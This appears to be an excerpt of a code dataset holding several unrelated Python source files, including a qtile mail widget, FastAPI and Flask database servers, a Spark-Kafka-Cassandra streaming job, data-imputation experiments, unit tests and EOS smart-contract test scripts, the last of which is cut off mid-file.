-*- coding: utf-8 -*-\n# vim: set sw=4 et tw=80:\n\nfrom . import base\n\nimport six\nimport os.path\nimport mailbox\n\n\nclass Maildir(base.ThreadedPollText):\n \"\"\"\n A simple widget showing the number of new mails in maildir mailboxes.\n \"\"\"\n\n defaults = [\n (\"maildirPath\", \"~/Mail\", \"path to the Maildir folder\"),\n (\"subFolders\", [], 'The subfolders to scan (e.g. 
[{\"path\": \"INBOX\", '\n '\"label\": \"Home mail\"}, {\"path\": \"spam\", \"label\": \"Home junk\"}]'),\n (\"separator\", \" \", \"the string to put between the subfolder strings.\"),\n ]\n\n def __init__(self, maildirPath=None, subFolders=None, separator=\" \", **config):\n base.ThreadedPollText.__init__(self, **config)\n self.add_defaults(Maildir.defaults)\n\n if maildirPath is not None:\n base.deprecated(\"maildirPath is deprecated\")\n self.maildirPath = maildirPath\n if subFolders is not None:\n base.deprecated(\"subFolders is deprecated\")\n self.subFolders = subFolders\n if separator != \" \":\n base.deprecated(\"separator is deprecated\")\n self.separator = separator\n\n # if it looks like a list of strings then we just convert them\n # and use the name as the label\n if isinstance(subFolders[0], six.string_types):\n self._subFolders = [\n {\"path\": folder, \"label\": folder}\n for folder in subFolders\n ]\n\n def poll(self):\n \"\"\"\n Scans the mailbox for new messages.\n\n @return: A string representing the current mailbox state.\n \"\"\"\n state = {}\n\n def to_maildir_fmt(paths):\n for path in iter(paths):\n yield path.rsplit(\":\")[0]\n\n for subFolder in self.subFolders:\n path = os.path.join(self.maildirPath, subFolder[\"path\"])\n maildir = mailbox.Maildir(path)\n state[subFolder[\"label\"]] = 0\n\n for file in to_maildir_fmt(os.listdir(os.path.join(path, \"new\"))):\n if file in maildir:\n state[subFolder[\"label\"]] += 1\n\n return self.format_text(state)\n\n def format_text(self, state):\n \"\"\"\n Converts the state of the subfolders to a string.\n\n @param state: a dictionary as returned by mailbox_state.\n @return: a string representation of the given state.\n \"\"\"\n return self.separator.join(\n \"{}: {}\".format(*item) for item in state.items()\n )\n","sub_path":"libqtile/widget/maildir.py","file_name":"maildir.py","file_ext":"py","file_size_in_byte":2496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"445970225","text":"#!/usr/bin/env python3\nimport json\nimport datetime\n\nimport sys\n\nsys.path.append(\"data\")\nimport vars\n\nclass CourseData:\n def __init__(self):\n self._coursedata={}\n\n with open(\"data/courses.json\") as fp:\n data=json.loads(fp.read())\n\n\n for _semester in data['semesters']:\n if _semester['name'] == vars.CurrentSemester:\n self._coursedata=_semester\n return\n\n #if we got here, we have a problem.. json does not contain the given semester\n\n def getAllCourses(self):\n _list=[]\n for _d in self._coursedata['courses']:\n _list.append(_d['name'])\n\n return _list\n\n def getCurrentCourseAssignments(self, coursename):\n _assignments=[]\n for _d in self._coursedata['courses']:\n if _d['name'] == coursename:\n for _a in _d['assignments']:\n _begin=datetime.datetime.strptime(_a['BeginDate'], '%Y-%m-%d')\n _end=datetime.datetime.strptime(_a['DueDate'], '%Y-%m-%d')\n _now=datetime.datetime.now()\n if _begin < _now < _end:\n _assignments.append({'name': _a['name'], 'BeginDate':_a['BeginDate'], \n 'DueDate': _a['DueDate']})\n\n return _assignments\n\n\nif __name__ == '__main__':\n _cd=CourseData()\n print(_cd.getAllCourses())\n print(_cd.getCurrentCourseAssignments('CIS 150'))\n","sub_path":"CourseData.py","file_name":"CourseData.py","file_ext":"py","file_size_in_byte":1401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"497460683","text":"#! 
/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nfrom typing import Optional\n\nfrom fastapi import FastAPI, Request\nimport uvicorn\nfrom fastapi.exception_handlers import request_validation_exception_handler\nfrom pydantic import ValidationError\n\nfrom routers_dev.common import Slot\nfrom routers_dev import (\n routers_author, routers_db, routers_frags, routers_misc, routers_posneg,\n routers_publ, routers_top)\nfrom server_utils import _init_logging\nfrom utils import get_logger_dev as get_logger, load_config_dev as load_config\n\n\n_logger = get_logger()\n\n\ndef main():\n _init_logging()\n\n # app, conf = create_srv()\n # srv_run_args = conf['srv_run_args']\n # web.run_app(app, **srv_run_args)\n cummon_prefix = '/cirtec_dev'\n\n app = FastAPI(\n openapi_url=cummon_prefix + '/openapi.json',\n docs_url=cummon_prefix + '/docs',\n redoc_url=cummon_prefix + '/redoc',\n description='Data server.'\n )\n\n conf = _load_conf()\n slot:Optional[Slot] = None\n\n # router.add_event_handler('startup', partial(Slot.init_slot, conf))\n # app.on_event('startup')(partial(Slot.init_slot, conf))\n @app.on_event('startup')\n async def _():\n nonlocal conf, slot\n slot = Slot.init_slot(conf)\n\n @app.on_event('shutdown')\n async def _close_app():\n nonlocal slot\n await slot.close()\n\n app.include_router(routers_db.router, prefix=cummon_prefix + '/db')\n app.include_router(routers_author.router, prefix=cummon_prefix + '/authors')\n app.include_router(routers_frags.router, prefix=cummon_prefix + '/frags')\n app.include_router(routers_posneg.router, prefix=cummon_prefix + '/pos_neg')\n app.include_router(routers_publ.router, prefix=cummon_prefix + '/publ')\n app.include_router(routers_top.router, prefix=cummon_prefix + '/top')\n app.include_router(routers_misc.router, prefix=cummon_prefix)\n\n @app.middleware(\"http\")\n async def db_session_middleware(request:Request, call_next):\n # request.state.slot = Slot.instance()\n Slot.set2request(request)\n response = await call_next(request)\n return response\n\n @app.exception_handler(ValidationError)\n async def ex_hdlr(request, exc):\n return await request_validation_exception_handler(request, exc)\n\n # asgi_app = SentryAsgiMiddleware(app)\n\n conf_app = conf['srv_run_args']\n uvicorn.run(\n app, host=conf_app.get('host') or '0.0.0.0',\n port=conf_app.get('port') or 8668,\n use_colors=True, log_config=None)\n\n\ndef _load_conf() -> dict:\n # env.read_envfile()\n conf = load_config()\n\n return conf\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"server_cirtec_devf.py","file_name":"server_cirtec_devf.py","file_ext":"py","file_size_in_byte":2540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"309257785","text":"import redis\nfrom dbSettings import REDIS_URL\nimport pymysql\nimport dbSettings\n\nclass detailTask():\n def __init__(self):\n self.db = dbSettings.db_connect()\n self.cursor = self.db.cursor()\n self.listTable = \"`houselist`\"\n self.redis = redis.Redis.from_url(REDIS_URL)\n print(REDIS_URL)\n\n\n def insertTask(self):\n sql = \"SELECT house_id FROM \" + self.listTable \n self.cursor.execute(sql)\n self.db.commit()\n\n results = self.cursor.fetchall()\n\n print(len(results))\n count = 0\n for row in results:\n count += 1\n self.redis.lpush(\"detail:start_urls\", row[\"house_id\"])\n if count % 10000 == 0:\n print(count)\n\n\n\nif __name__ == \"__main__\":\n task = detailTask()\n 
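# pushes every house_id from the houselist table onto the Redis queue detail:start_urls\n 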
task.insertTask()\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"airbnbSpider_scrapy/airbnbSpider_us_local/airbnbSpider/detail_task.py","file_name":"detail_task.py","file_ext":"py","file_size_in_byte":861,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"77137087","text":"import os\n\n# uncomment to force CPU training\nos.environ['CUDA_VISIBLE_DEVICES'] = '-1'\n\n\nimport pandas as pd\nimport pdb\nimport sklearn\nimport sklearn.preprocessing\nimport numpy as np\nimport fancyimpute\n#import matplotlib.pyplot as plt\nimport heapq\nimport pickle\n\n# Fixed random seed\n# Even though we fixed the random seed, there are still some randomness in the results due to SGD based algorithms\nnp.random.seed(2019)\ndf1 = pd.read_csv('user_score.csv')\ndata = df1[['user_id', 'ifp_id']]\nenc = sklearn.preprocessing.OrdinalEncoder()\ndf2 = enc.fit_transform(data).astype(int)\n\nuser_ids = df2[:, 0]\nifp_ids = df2[:, 1]\nbrier_scores = df1['brier_score']\n\nX = np.zeros((max(user_ids)+1, max(ifp_ids)+1))\nn_rows, n_columns = X.shape\n\nfor index, row in enumerate(df2):\n\tX[row[0], row[1]] = brier_scores[index]\n\ndf = pd.DataFrame(X)\n\ndef calculate_mse_ary(X_filled, missing_mask):\n\tassert X_filled.shape == X.shape\n\treturn ((X_filled[missing_mask] - X[missing_mask]) ** 2).mean()\n\ndef run_imputation(drop_probablity):\n\t# using shuffle instead of generating random numbers as mask to ensure exact percentages of cells are masked\n\tn_total = int(np.prod(X.shape))\n\tn_drop = int(round(n_total * drop_probablity))\n\tn_keep = n_total - n_drop\n\t# True is drop, False is keep\n\tmissing_mask = np.asarray([True] * n_drop + [False] * n_keep)\n\tnp.random.shuffle(missing_mask)\n\tmissing_mask = missing_mask.reshape(X.shape)\n\n\t# The probablity of all cells in a row are masked is (drop_probablity)^n_columns. 
If drop_probablity is large, this could happen.\n\t# If that happens, some algorithm will report error, and it's not reasonable to expect missing values could be recoverd in this case.\n\t# So add this logic to ensure at least one unmasked cell per line, while still keep the total number of masked cell unchanged.\n\tdrop_count_heap = [(sum(row), index) for index, row in enumerate(missing_mask)]\n\theapq.heapify(drop_count_heap)\n\n\tfor row in missing_mask:\n\t\tif sum(row) == n_columns:\n\t\t\tkeep_index = np.random.randint(0, n_columns)\n\t\t\trow[keep_index] = False\n\n\t\t\tmost_keep_row_index = heapq.heappop(drop_count_heap)\n\t\t\tmost_keep_row = missing_mask[most_keep_row_index[1]]\n\t\t\tdrop_index = np.random.choice(np.where(most_keep_row==False)[0])\n\t\t\tmost_keep_row[drop_index] = True\n\t\t\theapq.heappush(drop_count_heap, (sum(most_keep_row), most_keep_row_index[1]))\n\n\t# verify the total number of masked cell unchanged\n\tassert np.sum(missing_mask) == n_drop\n\n\tX_incomplete = df.mask(missing_mask)\n\t#X_incomplete.to_csv('incomplete_{}.csv'.format(drop_probablity), index=False)\n\tX_incomplete = X_incomplete.values\n\n\tX_filled_simple = fancyimpute.SimpleFill().fit_transform(X_incomplete)\n\tsimple_mse = calculate_mse_ary(X_filled_simple, missing_mask)\n\n\tX_filled_knn1 = fancyimpute.KNN(k=1).fit_transform(X_incomplete)\n\tknn_mse1 = calculate_mse_ary(X_filled_knn1, missing_mask)\n\n\tX_filled_knn3 = fancyimpute.KNN(k=3).fit_transform(X_incomplete)\n\tknn_mse3 = calculate_mse_ary(X_filled_knn3, missing_mask)\n\n\tX_filled_knn10 = fancyimpute.KNN(k=10).fit_transform(X_incomplete)\n\tknn_mse10 = calculate_mse_ary(X_filled_knn10, missing_mask)\n\n\tX_filled_knn15 = fancyimpute.KNN(k=15).fit_transform(X_incomplete)\n\tknn_mse15 = calculate_mse_ary(X_filled_knn15, missing_mask)\n\n\tX_incomplete_normalized = fancyimpute.BiScaler().fit_transform(X_incomplete)\n\tX_filled_softimpute = fancyimpute.SoftImpute().fit_transform(X_incomplete_normalized)\n\tsoftImpute_mse = calculate_mse_ary(X_filled_softimpute, missing_mask)\n\n\tX_filled_iter = fancyimpute.IterativeImputer().fit_transform(X_incomplete)\n\titer_mse = calculate_mse_ary(X_filled_iter, missing_mask)\n\n\tX_filled_svd = fancyimpute.IterativeSVD().fit_transform(X_incomplete)\n\tsvd_mse = calculate_mse_ary(X_filled_svd, missing_mask)\n\n\tX_filled_mf = fancyimpute.MatrixFactorization().fit_transform(X_incomplete)\n\tmf_mse = calculate_mse_ary(X_filled_mf, missing_mask)\n\n\t# It's too slow for large matrix, comment out\n\t#X_filled_nnm = fancyimpute.NuclearNormMinimization().fit_transform(X_incomplete)\n\t#nnm_mse = ((X_filled_nnm[missing_mask] - X[missing_mask]) ** 2).mean()\n\n\tdf_mse = pd.DataFrame([\n\t\t['SimpleFill', simple_mse],\n\t\t['KNN1', knn_mse1],\n\t\t['KNN3', knn_mse3],\n\t\t['KNN10', knn_mse10],\n\t\t['KNN15', knn_mse15],\n\t\t['SoftImpute', softImpute_mse],\n\t\t['IterativeImputer', iter_mse],\n\t\t['IterativeSVD', svd_mse],\n\t\t['MatrixFactorization', mf_mse]\n\t], columns=['method', 'mse'])\n\n\treturn df_mse\n\n#df_mse_80 = run_imputation(0.01)\n#df_mse_80.to_csv('stat_user_ifp_brier.csv', index=False)\n#pdb.set_trace()\n#print('Before plot')\n\nplot_X = []\nplot_Y = []\nfor index, drop_probablity in enumerate(np.linspace(0.01, 0.85, 50)):\n\tprint(index, drop_probablity)\n\tdf_mse = run_imputation(drop_probablity)\n\tplot_X.append(drop_probablity)\n\tplot_Y.append(df_mse['mse'])\n\nplot_Y = np.asarray(plot_Y)\n\nwith open('data/{}_{}.pickle'.format(save_prefix, run_name), 'wb') as 
fout:\n\tpickle.dump(plot_Y, fout, pickle.HIGHEST_PROTOCOL)\n\nprint('Done')\n'''\nplt.plot(plot_X, plot_Y[:, 0], label='SimpleFill')\nplt.plot(plot_X, plot_Y[:, 1], label='KNN1')\nplt.plot(plot_X, plot_Y[:, 2], label='KNN3')\nplt.plot(plot_X, plot_Y[:, 3], label='KNN10')\nplt.plot(plot_X, plot_Y[:, 4], label='KNN15')\nplt.plot(plot_X, plot_Y[:, 5], label='SoftImpute')\nplt.plot(plot_X, plot_Y[:, 6], label='IterativeImputer')\n#plt.plot(plot_X, plot_Y[:, 7], label='IterativeSVD')\nplt.plot(plot_X, plot_Y[:, 8], label='MatrixFactorization')\nplt.xlabel('Drop Probablity')\nplt.ylabel('MSE of Brier score')\nplt.legend()\nplt.show()\nwith open('user_ifp_brier.pickle', 'wb') as fout:\n\tpickle.dump([plot_X, plot_Y], fout, pickle.HIGHEST_PROTOCOL)\n\npdb.set_trace()\nprint('Pause before exit')\n'''\n","sub_path":"user_ifp_brier.py","file_name":"user_ifp_brier.py","file_ext":"py","file_size_in_byte":5640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"415989313","text":"import sys\n\nfrom mock import patch, ANY\nfrom erroremail import ErrorEmail\n\n\nclass TestSend(object):\n\n def setup(self):\n self.config = {\n 'SERVER': 'MYHOST',\n 'TO': ['my@email.com'],\n 'FROM': 'your@email.com',\n 'SUBJECT': 'ERR: {host}:{port} {message}',\n }\n self.err = ErrorEmail(self.config, host='x1', port=9999)\n\n @patch('erroremail.smtplib.SMTP')\n def test_send(self, SMTP):\n try:\n with self.err:\n raise Exception('Whoa')\n except:\n pass\n\n server = SMTP()\n server.sendmail.assert_called_with(\n self.config['TO'],\n self.config['FROM'],\n ANY\n )\n\n def test_get_subject(self):\n try:\n tuple()[0]\n except:\n subject = self.err.get_subject(sys.exc_info())\n assert subject == 'ERR: x1:9999 IndexError: tuple index out of range'\n\n def test_create_message(self):\n try:\n tuple()[0]\n except:\n info = sys.exc_info()\n\n message = self.err.create_message_from_traceback(info)\n subject = self.err.get_subject(info)\n\n assert message['Content-Type'] == 'multipart/alternative'\n assert message['Subject'] == subject\n assert message['To'] == 'my@email.com'\n assert message['From'] == 'your@email.com'\n","sub_path":"tests/test_send_email.py","file_name":"test_send_email.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"387153949","text":"# from flask import Flask, render_template\nfrom app import app\nfrom flask import request, jsonify\nimport pymysql\nimport json\n\n\n\nclass Database:\n def __init__(self):\n host = \"localhost\"\n user = \"root\"\n password = \"admin1234\"\n db = \"usmstd\"\n\n self.connectionObj = pymysql.connect(host=host, user=user, password=password, db=db, cursorclass=pymysql.cursors.DictCursor)\n self.cursorObj = self.connectionObj.cursor()\n\n def get_data(self):\n sql_query = \"SELECT collect_date, tof_s1, tof_s2, tof_s3, tof_s4, temp_s1, temp_s2, temp_s3, temp_s4, \" \\\n \"tc1, tc2, tc3, tc4, tc5, tc6 FROM experimental_data\"\n self.cursorObj.execute(sql_query)\n result = list(self.cursorObj.fetchall())\n\n # Converts all decimal values in the dictionary to a string\n result_stringified = [dict([key, str(value)] for key, value in dicts.items()) for dicts in result]\n\n return result_stringified\n\n def insert_data(self, json_data):\n # print(json_data)\n collect_date = json_data[\"collect_date\"]\n tof_s1 = json_data[\"tof_s1\"]\n tof_s2 = json_data[\"tof_s2\"]\n tof_s3 = json_data[\"tof_s3\"]\n tof_s4 = json_data[\"tof_s4\"]\n temp_s1 
= json_data[\"temp_s1\"]\n temp_s2 = json_data[\"temp_s2\"]\n temp_s3 = json_data[\"temp_s3\"]\n temp_s4 = json_data[\"temp_s4\"]\n tc1 = json_data[\"tc1\"]\n tc2 = json_data[\"tc2\"]\n tc3 = json_data[\"tc3\"]\n tc4 = json_data[\"tc4\"]\n tc5 = json_data[\"tc5\"]\n tc6 = json_data[\"tc6\"]\n\n sql_query = \"INSERT INTO experimental_data() VALUES(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s)\"\n data = (collect_date, tof_s1, tof_s2, tof_s3, tof_s4, temp_s1, temp_s2, temp_s3, temp_s4, tc1, tc2,\n tc3, tc4, tc5, tc6)\n\n self.cursorObj.execute(sql_query, data)\n self.connectionObj.commit()\n resp = jsonify('Data added successfully!!!')\n\n return resp\n\n\n# Class place holder for ORM implementation\n# class dataVals:\n# def __init__(self, firstname, lastname, gender):\n# self.firstname = firstname\n# self.lastname = lastname\n# self.gender = gender\n\n\n\n@app.route('/')\n@app.route('/get_data')\ndef get_db_data():\n db = Database()\n fetched_data = db.get_data()\n print(fetched_data)\n\n # converts to JSON\n fetched_data_json = json.dumps(fetched_data)\n\n return fetched_data_json\n\n\n@app.route('/add', methods=['POST'])\ndef add_data_to_db():\n _json = request.json\n db = Database()\n ret_msg = db.insert_data(_json)\n return ret_msg\n\n\n\n","sub_path":"db_rest_app/app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"358081292","text":"import pytest\nfrom torch import nn\n\nfrom nncf.utils import training_mode_switcher\nfrom nncf.initialization import DataLoaderBNAdaptationRunner\n\nfrom tests.helpers import BasicConvTestModel, TwoConvTestModel, MockModel\nfrom tests.quantization.test_saturation_issue_export import DepthWiseConvTestModel, EightConvTestModel\n# pylint:disable=unused-import\nfrom tests.modules.test_rnn import _seed\n\n\ndef save_model_training_state(module, model_state):\n for ch in module.children():\n model_state[ch] = ch.training\n save_model_training_state(ch, model_state)\n\n\ndef compare_saved_model_state_and_current_model_state(module, model_state):\n for ch in module.children():\n assert model_state[ch] == ch.training\n compare_saved_model_state_and_current_model_state(ch, model_state)\n\n\ndef randomly_change_model_training_state(module):\n import random\n for ch in module.children():\n if random.uniform(0, 1) > 0.5:\n ch.training = False\n else:\n ch.training = True\n randomly_change_model_training_state(ch)\n\n\n@pytest.mark.parametrize('model', [BasicConvTestModel(), TwoConvTestModel(), MockModel(),\n DepthWiseConvTestModel(), EightConvTestModel()])\ndef test_training_mode_switcher(_seed, model):\n randomly_change_model_training_state(model)\n\n saved_model_state = {}\n save_model_training_state(model, saved_model_state)\n\n with training_mode_switcher(model, True):\n # pylint: disable=unnecessary-pass\n pass\n\n compare_saved_model_state_and_current_model_state(model, saved_model_state)\n\n\n@pytest.mark.parametrize('model', [BasicConvTestModel(), TwoConvTestModel(), MockModel(),\n DepthWiseConvTestModel(), EightConvTestModel()])\ndef test_bn_training_state_switcher(_seed, model):\n runner = DataLoaderBNAdaptationRunner(model, 'cuda', 0)\n saved_model_state = {}\n\n def check_were_only_bn_training_state_changed(module, saved_state):\n for ch in module.children():\n if isinstance(ch, (nn.BatchNorm1d,\n nn.BatchNorm2d,\n nn.BatchNorm3d)):\n assert ch.training\n else:\n assert ch.training == saved_state[ch]\n 
check_were_only_bn_training_state_changed(ch, saved_state)\n\n randomly_change_model_training_state(model)\n\n save_model_training_state(model, saved_model_state)\n\n # pylint: disable=protected-access\n with runner._bn_training_state_switcher():\n check_were_only_bn_training_state_changed(model, saved_model_state)\n\n compare_saved_model_state_and_current_model_state(model, saved_model_state)\n","sub_path":"tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":2703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"298728909","text":"import sys\n\nsys.path.append('/'.join(sys.path[0].split('/')[0:-1]))\nsys.path.append('/'.join(sys.path[0].split('/')[0:-2]))\n\nimport a_api\nimport db\n\n#making the account\nx = a_api.make_account({})\n\n#checking the server response\nif x.status_code != 400:\n db.reset()\n raise Exception(\n f\"Account creation w/ no username did not return 400 response, instead returned {x.status_code}\"\n )\n\ndb.reset()","sub_path":"tests/accounts/create_account/create_account_no_payload.py","file_name":"create_account_no_payload.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"441161448","text":"import findspark\nfindspark.init()\nimport pyspark as ps\nfrom confluent_kafka.schema_registry import SchemaRegistryClient\nfrom confluent_kafka.schema_registry.avro import AvroDeserializer\nfrom confluent_kafka.serialization import SerializationContext\nfrom pyspark.sql.functions import udf, array\nfrom pyspark.sql.types import DoubleType, StringType, ArrayType\nfrom cassandra.cluster import Cluster\nfrom cassandra.auth import PlainTextAuthProvider\n\n\nwindowSize = 5\nslideSize = 3\nwindowDuration = '{} seconds'.format(windowSize)\nslideDuration = '{} seconds'.format(slideSize)\n\n\ndef getSparkInstance():\n \"\"\"\n @return: Return Spark session\n \"\"\"\n spark = ps.sql.SparkSession.builder \\\n .master(\"local[4]\") \\\n .appName(\"individual\") \\\n .getOrCreate()\n return spark\n\n\nspark = getSparkInstance()\n\n\ndef process_row(serialized_data):\n schema = '''\n {\n \"namespace\": \"org.mddarr.rides.event.dto\",\n \"type\": \"record\",\n \"name\": \"AvroRideCoordinate\",\n \"fields\": [\n {\"name\": \"eventime\", \"type\": \"long\"},\n {\"name\": \"latitude\", \"type\": \"double\"},\n {\"name\": \"longitude\", \"type\": \"double\"}\n ]\n }\n '''\n schemaRegistryClient = SchemaRegistryClient({\"url\": \"http://localhost:8081\"})\n avroDeserializer = AvroDeserializer(schema, schemaRegistryClient)\n serializationContext = SerializationContext(\"coordinates\", schema)\n deserialized_row = avroDeserializer(serialized_data, serializationContext)\n print(\"THE DESERIALIZED ROW LOOKS LIKE \" + str(deserialized_row))\n\n return [deserialized_row['latitude'], deserialized_row['longitude'],float(deserialized_row['eventime'])]\n\nstreamingDF = spark \\\n .readStream \\\n .format(\"kafka\") \\\n .option(\"kafka.bootstrap.servers\", \"localhost:9092\") \\\n .option(\"subscribe\", \"coordinates\") \\\n .option('includeTimestamp', 'true') \\\n .load()\n\ndeserialize_row_udf = udf(lambda x: process_row(x), ArrayType(DoubleType()))\ndeserialized_value_dataframe = streamingDF.withColumn('deserialized_value', deserialize_row_udf(\"value\"))\n\ndeserialized_split_df = deserialized_value_dataframe.selectExpr(\"key\",\"timestamp\", \"deserialized_value[0] as lat\",\n \"deserialized_value[1] as lng\", 
\"deserialized_value[2] as eventime\")\n\n\n# deserialized_value_dataframe = deserialized_value_dataframe.select(['key','timestamp','time','deserialized_value',\n# deserialized_value_dataframe.coordinates[0], deserialized_value_dataframe.coordinates[1],deserialized_value_dataframe.coordinates[2] ])\n# split_df = deserialized_value_dataframe.select(de deserialized_value_dataframe.coordinates[0], deserialized_value_dataframe.coordinates[1],deserialized_value_dataframe.coordinates[2] )\n\n\n\n# deserialized_value_dataframe = deserialized_value_dataframe.withColumnRenamed('coordinates', 'value')\n\n# split_df = df.select(df.name, df.coordinates[0], df.coordinates[1])\n#\n#\n# split_df = df.selectExpr(\"name as name\", \"coordinates[0] as lat\", \"coordinates[1] as lng\")\n\n\n\ndef insert_coordinate_data_cassandra(row):\n\n print(\"THE ROW LOOKS LIKE \" + str(row))\n\n key = row['key'].decode('utf-8')\n\n insert_time_series_data_point = \"\"\"INSERT INTO coordinates(rideid, time, latitude, longitude) VALUES(%s,%s,%s, %s);\"\"\"\n try:\n dbsession = initialize_cassanrdra_session()\n dbsession.set_keyspace('ks1')\n dbsession.execute(insert_time_series_data_point, [key, int(row['eventime']), row['lat'], row['lng']])\n print(\"I EXECUTED THE QUERY\")\n\n except Exception as e:\n print(e)\n print(\"I DID NOT EXECUTE THE QUERY\")\n\n\ndef initialize_cassanrdra_session():\n auth_provider = PlainTextAuthProvider(username='cassandra', password='cassandra')\n try:\n cluster = Cluster([\"127.0.0.1\"], auth_provider=auth_provider)\n session = cluster.connect()\n return session\n except Exception as e:\n print(e)\n return None\n\n\nds = deserialized_split_df \\\n .writeStream \\\n .format(\"console\") \\\n .foreach(insert_coordinate_data_cassandra) \\\n .trigger(processingTime=\"5 seconds\") \\\n .start()\n\n# ds = deserialized_value_dataframe \\\n# .selectExpr(\"value\", \"CAST(key AS STRING)\", \"timestamp\") \\\n# .writeStream \\\n# .foreach(process_row) \\\n# .trigger(processingTime=\"5 seconds\") \\\n# .start()\n\nspark.streams.awaitAnyTermination()\n","sub_path":"structured_streaming/ride_coordinate_sink/cassandra_coordinates_stream_sink.py","file_name":"cassandra_coordinates_stream_sink.py","file_ext":"py","file_size_in_byte":4378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"122483263","text":"import asyncio\nimport time\n\nimport config\nimport netboxz\nimport models\nimport memstat\n\n\nlast_temp = 0\n\nasync def check_cluster_temp(app):\n while True:\n Tmax = max(map(netboxz.temp, range(1,4)))\n print('Check temp: Tmax = {}'.format(Tmax))\n\n if Tmax > config.crit_temp and Tmax > last_temp:\n for chat in models.Chat.select().where(models.Chat.user == None):\n app['bot'].send_message(chat.id, \"Oh it's getting hot\")\n last_temp = Tmax\n\n await asyncio.sleep(config.temp_update_time)\n\n\nasync def check_swap_usage(app):\n while True:\n bad_nodes, swap_total, swap_free = memstat.get_nodes_overusing_swap(config.node_list, config.swap_overuse_threshold)\n if len(bad_nodes) > 0:\n message = 'Warning: swap overuse detected on nodes: '\n for i in range(len(bad_nodes)):\n message += '\\n' + bad_nodes[i] + ':\\t'\n message += ' used {0:.1f}G of {1:.1f}G'.format(\n (swap_total[i] - swap_free[i]) / 1048576,\n swap_total[i] / 1048576)\n\n for chat in models.Chat.select().where(models.Chat.user == None):\n app['bot'].send_message(chat.id, message)\n\n await 
asyncio.sleep(config.mem_update_time)\n","sub_path":"src/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"513215723","text":"import os\nimport re\nimport sys\nimport imp\nimport time\nimport struct\n\nimport debug\nimport wallet\nimport eosapi\nimport initeos\nimport traceback\nfrom eosapi import N, mp_compile, pack_bytes, pack_setabi, push_transactions\nfrom common import prepare, producer\n\ndef init(func):\n def func_wrapper(*args, **kwargs):\n prepare('hellolua', 'hello.lua', 'hello.abi', __file__, 10)\n func(*args, **kwargs)\n return func_wrapper\n\n@init\ndef test(name='mike'):\n r = eosapi.push_action('hellolua','sayhello', name, {'hellolua':'active'})\n assert r and not r['except']\n print('cost time:', r['cost'])\n\n# print(eosapi.JsonStruct(r[0]))\n# eosapi.produce_block()\n\n@init\ndef play():\n r = eosapi.push_action('hellolua', 'play', '', {'hellolua':'active'})\n assert r\n\n@init\ndef test2(count=100):\n actions = []\n for i in range(count):\n action = ['hellolua', 'sayhello', str(i), {'hellolua':'active'}]\n actions.append(action)\n\n ret, cost = eosapi.push_actions(actions)\n assert ret and not ret['except']\n print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef tt(count=1000):\n actions = []\n for i in range(count):\n args = {\"from\":'eosio', \"to\":'eosio.ram', \"quantity\":'%.4f EOS'%(0.01,), \"memo\":'hellolua'}\n action = ['eosio.token', 'transfer', args, {'eosio':'active'}]\n actions.append(action)\n\n ret, cost = eosapi.push_actions(actions)\n print(cost)\n print(ret['except'])\n assert ret and not ret['except']\n print('total cost time:%.3f s, cost per action: %.3f ms, actions per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef ttt(count=200):\n actions = []\n for i in range(count):\n args = {\"from\":'eosio', \"to\":'eosio.ram', \"quantity\":'%.4f EOS'%(0.01,), \"memo\":str(i)}\n args = eosapi.pack_args('eosio.token', 'transfer', args)\n action = ['eosio.token', 'transfer', args, [['eosio','active']]]\n actions.append([action])\n\n ret, cost = eosapi.push_transactions(actions)\n\n assert ret\n print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n\n@init\ndef test3(count=100):\n actions = []\n for i in range(count):\n act = ['hellolua', 'sayhello', b'hello,world%d'%(i,), {'hellolua':'active'}]\n actions.append([act])\n r, cost = eosapi.push_transactions(actions, True)\n print('total cost time:%.3f s, cost per action: %.3f ms, transaction per second: %.3f'%(cost/1e6, cost/count/1000, 1*1e6/(cost/count)))\n\n@init\ndef deploy_mpy():\n src_dir = os.path.dirname(os.path.abspath(__file__))\n file_name = 'hello.py'\n \n src_code = eosapi.mp_compile(os.path.join(src_dir, file_name))\n file_name = file_name.replace('.py', '.mpy')\n mod_name = file_name\n msg = int.to_bytes(len(mod_name), 1, 'little')\n msg += mod_name.encode('utf8')\n msg += int.to_bytes(1, 1, 'little') # compiled code\n msg += src_code\n\n print('++++++++++++++++deply:', file_name)\n r = eosapi.push_action('kitties','deploy',msg,{'kitties':'active'})\n assert 